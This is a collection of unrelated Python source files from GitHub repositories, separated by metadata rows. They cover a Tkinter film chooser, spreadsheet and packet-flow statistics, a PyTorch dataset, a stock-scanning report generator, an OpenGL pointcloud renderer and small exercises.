voor Star Wars") def say_choice_film3(self): root.configure(background="black") print("U heeft gekozen voor 007: Spectre") def say_choice_film4(self): root.configure(background="black") print("U heeft gekozen voor Lord of the Rings: The Fellowship") def say_choice_film5(self): root.configure(background="black") print("U heeft gekozen voor Kill Bill 2") def say_choice_film6(self): root.configure(background="black") print("U heeft gekozen voor The Ring") # # def show_img(self): # load = Image.open('img/martian.jpg') # render = ImageTk. def white(*args,**kwargs): root.configure(background="orange") app = Application(master=root) root.mainloop()
Alexanderkorn/A3-project
code/raster.py
raster.py
py
3,162
python
en
code
0
github-code
36
37314300998
# -*- coding:utf-8 -*- from openpyxl import Workbook from datetime import datetime def write_excel(filename): wb = Workbook() # load_work(filename) ws = wb.create_sheet('sheet', 0) wb.remove('sheet') ws = wb.active # default Sheet ws.title = 'Pi' ws['A1'] = 3.1415926 ws['A2'] = datetime.now().strftime('%Y-%m-%d') ws['A3'] = '=sum(A1:A5)' row = [1, 2, 3, 4] ws.append(row) rows = [ ['id', 'name', 'department'], ['001', 'lee', 'cs'], ['002', 'lee', 'ma'] ] ws.append(rows) wb.save(filename)
huazhicai/Demo
openpyxl/demo2.py
demo2.py
py
580
python
en
code
0
github-code
36
31345155935
import csv def get_flow_size_in_packets(tcpflows, udpflows): tcp_output = open("tcp_flow_size_packets.csv", "w") tcp_writer = csv.writer(tcp_output, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL) udp_output = open("udp_flow_size_packet.csv", "w") udp_writer = csv.writer(udp_output, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL) for k,v in tcpflows.items(): tcp_writer.writerow([k, len(v)]) for k,v in udpflows.items(): udp_writer.writerow([k, len(v)]) tcp_output.close() udp_output.close() def get_flow_size_in_bytes(tcpflows, udpflows): tcp_output = open("tcp_flow_size_bytes.csv", "w") tcp_writer = csv.writer(tcp_output, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL) udp_output = open("udp_flow_size_bytes.csv", "w") udp_writer = csv.writer(udp_output, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL) for k, v in tcpflows.items(): size = 0 # print(k, " : ", v) for i in v: size += int(i["frame.len"]) tcp_writer.writerow([k, size]) for k, v in udpflows.items(): size = 0 for i in v: size += int(i["frame.len"]) udp_writer.writerow([k, size]) tcp_output.close() udp_output.close() def get_flow_header_overhead(tcpflows): tcp_output = open("tcp_flow_overhead_ratio.csv", "w") tcp_writer = csv.writer(tcp_output, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL) for k, v in tcpflows.items(): total_headers_size = 0 total_data_sent = 0 for i in v: tcp_header_len = int(i["tcp.hdr_len"]) if i["tcp.len"].isdigit(): tcp_payload_len = int(i["tcp.len"]) else: tcp_payload_len = 0 ip_header_len = int(i["ip.hdr_len"]) frame_len = int(i["frame.len"]) ip_packet_size = tcp_header_len + tcp_payload_len + ip_header_len total_headers_size += tcp_header_len + ip_header_len + (frame_len - ip_packet_size) total_data_sent += tcp_payload_len if (total_data_sent == 0): tcp_writer.writerow([k, 9999]) else: tcp_writer.writerow([k, float(total_headers_size / total_data_sent)]) tcp_output.close()
David47295/d58courseproject
d58/flow_size.py
flow_size.py
py
2,457
python
en
code
0
github-code
36
12227662181
#!/home/mcollier/miniconda3/bin/python # -*- coding: utf-8 -*- __author__ = "Matthew Collier" __version__ = "0.5" # Typical use cases: #hf> /media/mcollier/ONYX/ONYX/W/portfolio/scripts/scan.py -v #hf> /media/mcollier/ONYX/ONYX/W/portfolio/scripts/scan_db.py -s WMT #hf> /media/mcollier/ONYX/ONYX/W/portfolio/scripts/scan_db.py -d 2017-11-03 ############################################################################## # TBD: # # * Add total volume and range for S&P500 broad metrics # * relativize the entire project's paths # * improve documentation # ############################################################################## # standard python library imports import argparse import collections import datetime as dt from math import pi import os # third party python imports from bs4 import BeautifulSoup # conda install beautifulsoup4 from bokeh.embed import file_html # conda install bokeh from bokeh.io import output_file, save from bokeh.layouts import column from bokeh.models import Legend from bokeh.plotting import figure, show from bokeh.resources import CDN, INLINE from pymysql import connect # conda install pymysql from pymysql.cursors import DictCursor from pandas import read_sql_query as rsql # conda install pandas # overriding with local imports home = "/home/mcollier/ONYX/wealth/portfolio" os.chdir(os.path.join(home, "scripts")) import common ############################################################################## # Local User Function Definitions ############################################################################## def get_broads(d_con, span, price_date, tids=[]): """ INPUTS: d_con (mysql) - A pymysql database connection with dict() return span (str) - 'daily' or 'weekly' price_date (str) - Data in ISO 8601 standard as YYYY-MM-DD tids [list] - id's of tickers to include with default of all OUTPUT: Dictionary with metrics as keys, and sums as values """ #span = "daily", #price_date = "2017-10-31", #tids = [1, 2, 5, 10, 20, 50, 100] tids = [str(tid) for tid in tids] cols = ["gt12", "gt26", "gt50", "ad"] # which metrics to sum() sql = ["SELECT " + ("SUM({}) AS ##,"*len(cols)).format(*cols)[:-1], "FROM {}_metrics".format(span), "WHERE price_date='{}'".format(price_date), "" if not tids else "AND symbol_id in {}".format(tuple(tids)), ';'] sql = " ".join(sql) sql = sql.replace("##", "{}").format(*cols) with d_con.cursor() as cur: cur.execute(sql) broads = cur.fetchone() return broads def get_sectors(n_con): """ INPUTS: n_con (mysql) - A "normal" pymysql database connection OUTPUT: Dictionary with sectors as keys, and lists of ticker_id's as values """ sectors = collections.defaultdict(list) with n_con.cursor() as n_cur: n_cur.execute("SELECT sector,id FROM symbols where flag='a';") results = n_cur.fetchall() for result in results: sectors[result[0]].append(result[1]) return sectors def get_longs(n_con, span, price_date): """ INPUTS: n_con (mysql) - A "normal" pymysql database connection span (str) - 'daily' or 'weekly' price_date (str) - Data in ISO 8601 standard as YYYY-MM-DD OUTPUT: Returns a list of potential long candidates. """ sql = ["SELECT symbol_id FROM {}_metrics".format(span), "WHERE price_date='{}'".format(price_date), "AND impulse>0", # positive impulse "AND gt26<0"] # below value zone with n_con.cursor() as n_cur: n_cur.execute(" ".join(sql)) results = n_cur.fetchall() return [result[0] for result in results] def get_shorts(n_con, span, price_date): """ INPUTS: n_con (mysql) - A "normal" pymysql database connection span (str) - 'daily' or 'weekly' price_date (str) - Data in ISO 8601 standard as YYYY-MM-DD OUTPUT: Returns a list of potential short candidates. """ sql = ["SELECT symbol_id FROM {}_metrics".format(span), "WHERE price_date='{}'".format(price_date), "AND impulse<0", # negative impulse "AND gt26>0"] # above value zone with n_con.cursor() as n_cur: n_cur.execute(" ".join(sql)) results = n_cur.fetchall() return [result[0] for result in results] def get_ticker_info(d_con, tid): """ INPUTS: d_con (mysql) - A pymysql database connection with dict() return tid (int) - id of ticker OUTPUT: Dictionary with information about a ticker. """ sql = ["SELECT id,ticker,name,sector FROM symbols", "WHERE id={}".format(tid), ";"] with d_con.cursor() as d_cur: d_cur.execute(" ".join(sql)) info = d_cur.fetchone() return info def report_individuals(n_con, price_date, tickers=[]): # tickers=singles """ INPUTS: n_con (mysql) - A "normal" pymysql database connection price_date (str) - Data in ISO 8601 standard as YYYY-MM-DD tickers () - A list of dictionaries, one per ticker. OUTPUT: HTML as a string. """ msg = "{:>3s}, {:>8s}, {:>7s}, {:>6s}, {:5d}, {:5.3f}, {:8.3f}, {:<s}\n" url = "<a href='./{}/{}{}.html'> {:s} </a>" n_cur = n_con.cursor() html = "" for t in tickers: #t={'id': 7,'name':'Abbott Laboratories','sector':'Health Care','ticker': 'ABT'} n_cur.execute( ("SELECT count(*) FROM daily_data " "WHERE symbol_id={}").format(t['id']) ) count = n_cur.fetchone()[0] n_cur.execute( ("SELECT atr13 FROM daily_metrics WHERE symbol_id={} " "AND price_date='{}';").format(t['id'], price_date) ) atr13 = n_cur.fetchone()[0] n_cur.execute( ("SELECT close FROM daily_data WHERE symbol_id={} " "AND price_date='{}'").format(t['id'], price_date) ) close = n_cur.fetchone()[0] ticker_id = str(t['id']).zfill(3) weekly_url = url.format(price_date, 'w', t["ticker"], "weekly") daily_url = url.format(price_date, 'd', t["ticker"], "daily") html += msg.format(ticker_id, weekly_url, daily_url, t["ticker"], count, atr13/close, close, t["sector"]) return html def bokeh_pages(d_con, span, price_date, att, tickers=[]): """ INPUTS: d_con (pymysql) - MySQL connection returning a dictionary span (str) - price_date (str) - att (str) - tickers (list) - List containing ticker IDs OUTPUT: HTML files on disk. """ # set up variables w = 12*60*60*1000 # half day in ms if span == "weekly": w *= 7 TOOLS = "crosshair,hover,pan,wheel_zoom,box_zoom,reset,save" data_sql = """SELECT d.price_date AS price_date, d.open AS open, d.high AS high, d.low AS low, d.close AS close, d.volume AS volume FROM {}_data d INNER JOIN symbols sym ON d.symbol_id = sym.id WHERE sym.ticker='{}' AND d.price_date>"{}" ORDER BY d.price_date ASC;""" metrics_sql = """SELECT price_date, ema12, ema26, atr13, macdf, macds, macdh, force2 FROM {}_metrics m INNER JOIN symbols sym ON m.symbol_id = sym.id WHERE sym.ticker='{}' AND m.price_date>"{}" ORDER BY m.price_date ASC;""" if span == "weekly": price_date = common.get_dotw("next", "Friday", from_date=price_date) offset = 52*7 + 1 else: offset = 60 time_obj = dt.datetime.strptime(price_date, "%Y-%m-%d") start_date = (time_obj - dt.timedelta(days=offset)).date().isoformat() for ticker in tickers: # tickers = longs # tickers = shorts # set up in-loop variables info = get_ticker_info(d_con, ticker) # ticker = 69 t = info["ticker"] D = rsql(data_sql.format(span, t, start_date), con=n_con, index_col="price_date") D["date"] = D.index.to_series() inc = D.close > D.open dec = D.open > D.close M = rsql(metrics_sql.format(span, t, start_date), con=n_con, index_col="price_date") M["date"] = M.index.to_series() # candlestick plot title = "{}, {} {}".format(price_date, span, t) p1 = figure(x_axis_type="datetime", tools=TOOLS, plot_height=618, plot_width=1000, title = title+" Candlestick") p1.xaxis.major_label_orientation = pi/4 p1.grid.grid_line_alpha = 0.3 p1.segment(D.date, D.high, D.date, D.low, line_width=2, color="black") p1.vbar(D.date[inc], w, D.open[inc], D.close[inc], fill_color="#D5E1DD", line_color="black") p1.vbar(D.date[dec], w, D.open[dec], D.close[dec], fill_color="#F2583E", line_color="black") # bokeh.pydata.org/en/latest/docs/user_guide/tools.html#hovertool # ema26, ema12, 1atr, 2atr, 3atr linear overlays p1.line(M.date, M.ema26 + 3*M.atr13, legend="3 ATR", color="gray") p1.line(M.date, M.ema26 + 2*M.atr13, legend="2 ATR", color="dimgray") p1.line(M.date, M.ema26 + M.atr13, legend="1 ATR", color="black") p1.line(M.date, M.ema26, legend="ema26", color="green", line_width=4) p1.line(M.date, M.ema12, legend="ema12", color="green", line_width=2) p1.line(M.date, M.ema26 - M.atr13, legend="-1 ATR", color="black") p1.line(M.date, M.ema26 - 2*M.atr13, legend="-2 ATR", color="dimgray") p1.line(M.date, M.ema26 - 3*M.atr13, legend="-3 ATR",color="gray") p1.legend.location = "top_left" p1.legend.border_line_width = 2 p1.legend.background_fill_color = "aliceblue" # second plot for macX family p2 = figure(x_axis_type="datetime", tools=TOOLS, plot_height=250, plot_width=1000, title = title+" MACDx") p2.vbar(x=M.date, width=w, top=M.macdh, color="#CAB2D6") p2.line(M.date, M.macds, legend="macds", color="black", line_width=2) p2.line(M.date, M.macdf, legend="macdf", color="black", line_width=1) p2.legend.location = "top_left" p2.legend.border_line_width = 2 p2.legend.background_fill_color = "aliceblue" # work with html report = file_html(column(p1,p2), resources=CDN, title=title) t_slash = t.replace('.', '/') url1 = "https://www.bloomberg.com/quote/{}:US".format(t_slash) url2 = "https://finance.google.com/finance?q={}".format(t) url3 = "https://www.reuters.com/finance/stocks/overview/{}".format(t) url4 = "http://shortsqueeze.com/?symbol={}".format(t.replace('.', '')) new = ("<h2> Research Links </h2>" "<ul><li><a href='{}'> Bloomberg </a>" "<li><a href='{}'> Google </a>" "<li><a href='{}'> Reuters </a>" "<li><a href='{}'> ShortSqueeze </a>" "</ul>").format(url1, url2, url3, url4) miso = BeautifulSoup(report, "html.parser") miso.body.insert(0, BeautifulSoup(new, "html.parser")) with open("{}{}.html".format(span[0], ticker), "w") as f: f.write(str(miso)) ############################################################################## # Treat this file as a script if invoked as __main__ ############################################################################## if __name__ == "__main__": # load configuration from commented JSON into dictionary conf = common.get_config("/etc/local/hf.conf") # assign parsed commandline values to working objects p = argparse.ArgumentParser() p.add_argument("-d", "--date", default="today", help="work with a particular date") p.add_argument("-s", "--select", default="", help="pull select ticker(s)... i.e. -s 69,488") p.add_argument("-v", "--verbose", action="store_true", help="print extra information on stdout") # p.add_argument("-N", "--no_insert", action="store_true", # help="suppress db insertion if true") # p.add_argument("-R", "--no_report", action="store_true", # help="option to suppress reporting at end") args = p.parse_args() vprint = print if args.verbose else lambda *a, **k: None d_con = connect(host=conf["db_host"], db=conf["db_name"], user=conf["db_user"], passwd=conf["db_pass"], cursorclass=DictCursor) n_con = connect(host=conf["db_host"], db=conf["db_name"], user=conf["db_user"], passwd=conf["db_pass"]) if args.date == "today": price_date=dt.datetime.today().date().isoformat() else: price_date = args.date # price_date = "2017-11-10" ########################################################################## # S&P500 and Sector indicators, World Research ########################################################################## html = """<html><head></head><body> <center><em><b><h1><hr><hr> "Every true idealist is after money ---because money means freedom, and freedom, in the final analysis, means life." - Oscar Wilde <hr><hr></h1></b></em></center> <h2> Verify Processing </h2> <a href="../logs> Log Directory </a> <h2> Global Sweep </h2> <ul> <li> CNN <a href="http://money.cnn.com/data/world_markets/europe/"> World Markets </a> Map & News <li> <a href="https://www.marketwatch.com/topics/columns/need-to-know"> Headlines </a> (a brief glance only) </ul>\n""" head = "{:>6s}, {:>4s}, {:>4s}, {:>4s}, {:>4s}" head = head.format("span", "gt50", "gt26", "gt12", "ad") # report S&P500-wide indicators html += ("<h2> S&P500 </h2><pre>") html += head + "<br>" row = "{:>6s}: {:4d}, {:4d}, {:4d}, {:4d}<br>" for span in ["daily", "weekly"]: pop = get_broads(d_con, span, price_date) html += row.format(span, int(pop['gt50']), int(pop['gt26']), int(pop['gt12']), int(pop['ad'])) # report sector indicators html += ("</pre><h2> GISC Sectors </h2>\n<pre>") html += (head + ", {:>3s}, sector<br>".format("n")) row = "{:>6s}: {:4d}, {:4d}, {:4d}, {:4d}, {:3d}, {}<br>" for span in ["daily", "weekly"]: sectors = get_sectors(n_con) for sector, values in sectors.items(): m = get_broads(d_con, span, price_date, values) html += row.format(span, int(m['gt50']), int(m['gt26']), int(m['gt12']), int(m['ad']), len(values), sector) html += "<br>" ########################################################################## # Individual short/long candidates ########################################################################## head = "{:>3s}, {:>8s}, {:>7s}, {:>6s}, {:>5s}, {:>5s}, {:>8s}, {:<s}\n" head = head.format("ID", "WEEKLIES", "DAILIES", "TICKER", "COUNT", "CoV", "CLOSE($)", "SECTOR") if not args.select: # work with shorts shorts = get_shorts(n_con, "daily", price_date) esses = [get_ticker_info(d_con, short) for short in shorts] html += ("<h2> Daily Shorts </h2><pre>") html += head html += report_individuals(n_con, price_date, esses) # work with longs longs = get_longs(n_con, "daily", price_date) elles = [get_ticker_info(d_con, long) for long in longs] html += ("</pre><h2> Daily Longs </h2><pre>") html += head html += report_individuals(n_con, price_date, elles) else: # work with singles select = args.select.split(',') select = [int(s) for s in select] singles = [get_ticker_info(d_con, s) for s in select] html += ("</pre><h2> Daily Single(s) </h2><pre>") html += head html += report_individuals(n_con, price_date, singles) with open("inspection/{}.html".format(price_date), "w") as f: f.write(html + "<br><br></pre></body></html>") ########################################################################## # Generate Inpspection/Research Webpages ########################################################################## # set up data date_dir = os.path.join(home, "inspection/{}".format(price_date)) if not os.path.exists(date_dir): os.makedirs(date_dir) os.chdir(date_dir) # create inspection/research web pages for span in ["weekly", "daily"]: if not args.select: attitudes = {"longs": longs, "shorts": shorts} else: attitudes = {"select": select} for att in attitudes.keys(): bokeh_pages(d_con, span, price_date, att, tickers=attitudes[att]) # finally... d_con.close() n_con.close()
mcStargazer/hf
scan_db.py
scan_db.py
py
17,177
python
en
code
0
github-code
36
13442778323
import os import argparse import tensorflow as tf import numpy as np from load import load_graph os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' """ Adapted from https://gist.github.com/morgangiraud/4a062f31e8a7b71a030c2ced3277cc20#file-medium-tffreeze-3-py """ if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("-m", dest='model_filename', type=str, help="frozen model .pb file to import") args = parser.parse_args() graph = load_graph(args.model_filename) for op in graph.get_operations(): print(op.name) X = graph.get_tensor_by_name('prefix/X:0') keep_prob = graph.get_tensor_by_name('prefix/keep_prob:0') output = graph.get_tensor_by_name('prefix/output:0') with tf.Session(graph=graph) as sess: prediction = sess.run(output, feed_dict={ X: np.random.randn(40, 66, 200, 3) * 100, keep_prob: 1.0 }) print(prediction)
Yunski/nvidia-cnn
test_load.py
test_load.py
py
961
python
en
code
9
github-code
36
15820786578
# -*- coding: utf-8 -*- #+--------------------------------------------------------------------------+# # Importem mòduls # #+--------------------------------------------------------------------------+# from distancies import Cosinus, Intersection #+--------------------------------------------------------------------------+# # Definim les classes # #+--------------------------------------------------------------------------+# class Recuperador (): def __init__(self, document, database, t_document, t_distancia): self._t_document = t_document self._database = database self._document = [arxiu for arxiu in self._database if arxiu.file_name == document][0] self._distancies = [] if t_distancia == "cosinus": self._operador = Cosinus() else: self._operador = Intersection() def processa_recuperacio(self): for fitxer in self._database: if fitxer.file_name != self._document.file_name: self._distancies.append((fitxer, self._operador.calcula_distancia(self._document, fitxer))) self._distancies = sorted(self._distancies, key=lambda x: x[1]) def get_results(self): return [x[0] for x in self._distancies]
segama4/Image_Search_Engine
recuperador.py
recuperador.py
py
1,427
python
en
code
0
github-code
36
4712176028
import numpy as np import os import trimesh.points from abc import ABC from typing import List, Union from dataclasses import dataclass from OpenGL import GL as gl from .renderable import Renderable from .shaders.shader_loader import Shader from ..camera.models import BaseCameraModel, StandardProjectionCameraModel from .shadowmap import ShadowMap from .lights import Light class Pointcloud(Renderable, ABC): """ Abstract class for all pointcloud objects """ @dataclass class PointcloudContainer: vertices: np.ndarray colors: np.ndarray def __init__(self, camera: BaseCameraModel = None, draw_shadows: bool = True, generate_shadows: bool = True): super().__init__(camera, draw_shadows, generate_shadows) self.render_back = True class SimplePointcloud(Pointcloud): """ Pointcloud with simple rendering algorithm: one point - one color (only ambient lightning) """ def __init__(self, *args, **kwargs): """ Args: camera (BaseCameraModel): main camera shadowmaps (List[ShadowMap]): list of shadowmaps (no more than Renderable.SHADOWMAPS_MAX) additional_lights: list of lights """ super().__init__(*args, **kwargs) def _init_shaders(self, camera_model, shader_mode): self.shader = shader = Shader() dirname = os.path.dirname(os.path.abspath(__file__)) if self.draw_shadows: shader.initShaderFromGLSL([os.path.join(dirname, f"shaders/simple_pointcloud/shadowdraw/vertex_{camera_model}.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/shadowdraw/fragment.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/shadowdraw/geometry.glsl")]) self.context.shader_ids.update(self.locate_uniforms(self.shader, ['shadowmap_MVP', 'shadowmap_enabled', 'shadowmaps', 'shadow_color'])) else: shader.initShaderFromGLSL([os.path.join(dirname, f"shaders/simple_pointcloud/vertex_{camera_model}.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/fragment.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/geometry.glsl")]) self.context.shader_ids.update(self.locate_uniforms(self.shader, ['splat_size'])) if self.generate_shadows: shadowgen_shader = self.shadowgen_shader = Shader() shadowgen_shader.initShaderFromGLSL([os.path.join(dirname, f"shaders/simple_pointcloud/shadowgen/vertex_{camera_model}.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/shadowgen/fragment.glsl")], [os.path.join(dirname, "shaders/simple_pointcloud/shadowgen/geometry.glsl")]) self.shadowgen_context.shader_ids.update(self.locate_uniforms(self.shadowgen_shader, ['splat_size'])) def _finalize_init(self): self.set_splat_size(0.5) def _delete_buffers(self): gl.glDeleteBuffers(2, [self.context.vertexbuffer, self.context.colorbuffer]) gl.glDeleteVertexArrays(1, [self.context.vao]) def _set_buffers(self, pointcloud: Union[Pointcloud.PointcloudContainer, trimesh.points.PointCloud]): glverts = np.copy(pointcloud.vertices.astype(np.float32), order='C') glcolors = np.copy(pointcloud.colors.astype(np.float32) / 255., order='C') assert len(glverts)==len(glcolors), "PC vertices and colors length should match" self.nglverts = len(glverts) self.context.vao = gl.glGenVertexArrays(1) gl.glBindVertexArray(self.context.vao) self.context.vertexbuffer = gl.glGenBuffers(1) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.vertexbuffer) gl.glBufferData(gl.GL_ARRAY_BUFFER, glverts.nbytes, glverts, gl.GL_STATIC_DRAW) self.context.colorbuffer = gl.glGenBuffers(1) gl.glBindBuffer( gl.GL_ARRAY_BUFFER, self.context.colorbuffer) gl.glBufferData( gl.GL_ARRAY_BUFFER, glcolors.nbytes, glcolors, gl.GL_STATIC_DRAW) def _update_buffers(self, pointcloud: Union[Pointcloud.PointcloudContainer, trimesh.points.PointCloud]): glverts = np.copy(pointcloud.vertices.astype(np.float32), order='C') glcolors = np.copy(pointcloud.colors.astype(np.float32) / 255., order='C') gl.glBindVertexArray(self.context.vao) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.vertexbuffer) gl.glBufferData(gl.GL_ARRAY_BUFFER, glverts.nbytes, glverts, gl.GL_DYNAMIC_DRAW) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.colorbuffer) gl.glBufferData(gl.GL_ARRAY_BUFFER, glcolors.nbytes, glcolors, gl.GL_DYNAMIC_DRAW) def set_splat_size(self, splat_size): self.context.splat_size = splat_size def get_splat_size(self): return self.context.splat_size def _upload_uniforms(self, shader_ids, lights=(), shadowmaps=()): gl.glUniform1f(shader_ids['splat_size'], self.context.splat_size) shadowmaps_enabled = np.zeros(self.SHADOWMAPS_MAX, dtype=np.int32) shadowmaps_enabled[:len(shadowmaps)] = 1 M = self.context.Model shadowmaps_lightMVP = [np.array(s.light_VP*M) for s in shadowmaps] shadowmaps_lightMVP = np.array(shadowmaps_lightMVP, dtype='f4') if self.draw_shadows: gl.glUniform1iv(self.context.shader_ids['shadowmap_enabled'], self.SHADOWMAPS_MAX, shadowmaps_enabled) gl.glUniformMatrix4fv(self.context.shader_ids['shadowmap_MVP'], len(shadowmaps), gl.GL_TRUE, shadowmaps_lightMVP) gl.glUniform4f(self.context.shader_ids['shadow_color'], *self.shadowcolor) for shadow_ind, shadowmap in enumerate(shadowmaps): gl.glActiveTexture(gl.GL_TEXTURE0+shadow_ind) gl.glBindTexture(gl.GL_TEXTURE_2D, shadowmap.texture) def _upload_shadowngen_uniforms(self, shader_ids): gl.glUniform1f(shader_ids['splat_size'], self.context.splat_size) def _draw(self, reset: bool, lights: List[Light], shadowmaps: List[ShadowMap]) -> bool: """ Internal draw pass Args: reset (bool): Reset drawing progress (for progressive drawing) lights (List[Light]): All light objects that influence the current object shadowmaps (List[ShadowMap]): List of shadowmaps to draw shadows from Returns: bool: if drawing buffer was changed (if something was actually drawn) """ if not reset: return False if not self.render_back: if np.array(self.context.MV).dot(np.array([0, 0, 1, 0]))[2] <= 0: return False self.shader.begin() self.upload_uniforms(self.context.shader_ids, lights, shadowmaps) gl.glBindVertexArray(self.context.vao) gl.glEnableVertexAttribArray(0) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.vertexbuffer) gl.glVertexAttribPointer(0, 3, gl.GL_FLOAT, gl.GL_FALSE, 0, None) gl.glEnableVertexAttribArray(1) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.colorbuffer) gl.glVertexAttribPointer(1, 4, gl.GL_FLOAT, gl.GL_FALSE, 0, None) gl.glDrawArrays(gl.GL_POINTS, 0, self.nglverts) gl.glDisableVertexAttribArray(0) gl.glDisableVertexAttribArray(1) self.shader.end() return True def _draw_shadowmap(self, shadowmap_camera: StandardProjectionCameraModel) -> bool: """ Shadow map draw pass - just to get depthmap values Args: shadowmap_camera (StandardProjectionCameraModel): perspective/ortho camera for shadow calculation Returns: bool: if drawing buffer was changed (if something was actually drawn) """ self.shadowgen_shader.begin() self.upload_shadowgen_uniforms(shadowmap_camera, self.shadowgen_context.shader_ids) gl.glBindVertexArray(self.context.vao) gl.glEnableVertexAttribArray(0) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.vertexbuffer) gl.glVertexAttribPointer(0, 3, gl.GL_FLOAT, gl.GL_FALSE, 0, None) gl.glEnableVertexAttribArray(1) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.colorbuffer) gl.glVertexAttribPointer(1, 4, gl.GL_FLOAT, gl.GL_FALSE, 0, None) gl.glDrawArrays(gl.GL_POINTS, 0, self.nglverts) gl.glDisableVertexAttribArray(0) gl.glDisableVertexAttribArray(1) self.shadowgen_shader.end() return True class SimplePointcloudProgressive(SimplePointcloud): """ SimplePointcloud with progressive drawing support """ def __init__(self, *args, progressive_draw_size: int = None, progressive_draw_shuffle: bool = False, **kwargs): """ Args: camera (BaseCameraModel): main camera shadowmaps (List[ShadowMap]): list of shadowmaps (no more than Renderable.SHADOWMAPS_MAX) additional_lights: list of lights progressive_draw_size (int): number of points draw in one pass, None for all progressive_draw_shuffle (bool): whether to shuffle drawing order during pointcloud load """ super().__init__(*args, **kwargs) self.progressive_draw_size = progressive_draw_size self.progressive_draw_shuffle = progressive_draw_shuffle self.is_progressive = True self.current_offset = 0 def _generate_indices(self, verts_count): inds = np.arange(verts_count, dtype=np.uint32) if self.progressive_draw_shuffle: np.random.shuffle(inds) return inds def _set_buffers(self, pointcloud: Pointcloud.PointcloudContainer): if self.progressive_draw_shuffle: inds = self._generate_indices(len(pointcloud.vertices)) pointcloud = self.PointcloudContainer(pointcloud.vertices[inds], pointcloud.colors[inds]) super()._set_buffers(pointcloud) self.current_offset = 0 def _update_buffers(self, pointcloud: Pointcloud.PointcloudContainer): if self.progressive_draw_shuffle: inds = self._generate_indices(len(pointcloud.vertices)) pointcloud = self.PointcloudContainer(pointcloud.vertices[inds], pointcloud.colors[inds]) super()._update_buffers(pointcloud) self.current_offset = 0 def _draw(self, reset: bool, lights: List[Light], shadowmaps: List[ShadowMap]) -> bool: if not self.render_back: if np.array(self.context.MV).dot(np.array([0, 0, 1, 0]))[2] <= 0: return False if reset: self.current_offset = 0 if self.current_offset >= self.nglverts: return False self.shader.begin() self.upload_uniforms(self.context.shader_ids, lights, shadowmaps) gl.glBindVertexArray(self.context.vao) gl.glEnableVertexAttribArray(0) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.vertexbuffer) gl.glVertexAttribPointer(0, 3, gl.GL_FLOAT, gl.GL_FALSE, 0, None) gl.glEnableVertexAttribArray(1) gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.context.colorbuffer) gl.glVertexAttribPointer(1, 4, gl.GL_FLOAT, gl.GL_FALSE, 0, None) if self.progressive_draw_size is None: gl.glDrawArrays(gl.GL_POINTS, 0, self.nglverts) self.current_offset += self.nglverts else: curr_len = min(self.progressive_draw_size, self.nglverts - self.current_offset) gl.glDrawArrays(gl.GL_POINTS, self.current_offset, curr_len) self.current_offset += self.progressive_draw_size gl.glDisableVertexAttribArray(0) gl.glDisableVertexAttribArray(1) self.shader.end() return True
vguzov/cloudrender
cloudrender/render/pointcloud.py
pointcloud.py
py
12,029
python
en
code
16
github-code
36
1812506827
import os import re import torch from PIL import Image from torch.utils.data import Dataset import torchvision.transforms as T import utils class MyDataset(Dataset): def __init__(self, file_list: list, name2label, transform_flag=True): self.file_list = file_list self.name2label = name2label self.transform_flag = transform_flag self.aug_transforms = T.Compose([ # T.Resize((256, 256)), T.ColorJitter(), T.RandomRotation(30), T.RandomHorizontalFlip(p=0.5), T.RandomVerticalFlip(p=0.5), ]) def __getitem__(self, item): image, label = self.transform(self.file_list[item], transform_flag=self.transform_flag) return image, label # @classmethod def transform(self, filename, transform_flag): # preprocess (default Identity) image = Image.open(filename) if transform_flag: image = self.aug_transforms(image) image = T.ToTensor()(image) class_name = re.findall('\w+_[0-9]', os.path.split(filename)[-1])[0][:-2] label = self.name2label[class_name] return image, label def __len__(self): return len(self.file_list)
newchexinyi/mobilefacenet
dataset.py
dataset.py
py
1,225
python
en
code
0
github-code
36
7702285883
# names = ['heier1', 'heier2', 'heier3'] # for name in names: # print( name ) sum = 0 for x in list( range(101) ): sum += x print( sum ) sum = 0 n = 100 while n > 0: sum = sum + n n = n - 2 print(sum)
Heier2013/learn_python
cycle.py
cycle.py
py
220
python
en
code
0
github-code
36
5950813494
import os class Weapon: stats = { "name": "Default_Weapon", "dmg": 1 } def __init__(self, weapon): # Select Weapon File weapon_path = "game\data\weapons" # Parsing Data try: with open(weapon_path + '/' + weapon, "r") as weapon_values: for line in weapon_values: newline = line.split('=') name = newline[0].rstrip() # Removing newline characters weapon_value = newline[1].rstrip() self.stats[name] = weapon_value except IOError as e: # Error for not finding save file os.system("cls||clear") print("Enemy Instantiation Save File Error") def load_name(self): return str(self.stats["name"]) def load_dmg(self): return int(self.stats["dmg"])
jalowe13/The-One-Python
The-One-Python/The-One-Python/game/mechanics/weapon.py
weapon.py
py
869
python
en
code
0
github-code
36
8254895274
import sys grades = {'Biology':80, 'Physics':88, 'Chemistry':98, 'Math':89, 'English':79, 'Music':67, 'History':68, 'Art':53, 'Economics':95, 'Psychology':88} def g (x): y = {} for key, value in grades.items(): if key != x: y[key] = value mean = sum(y.values()) / len(y) mean1 = round(mean, 2) print(mean1) g(sys.argv[1])
bferguson02/Python_Programs
grades.py
grades.py
py
361
python
en
code
0
github-code
36
44265086055
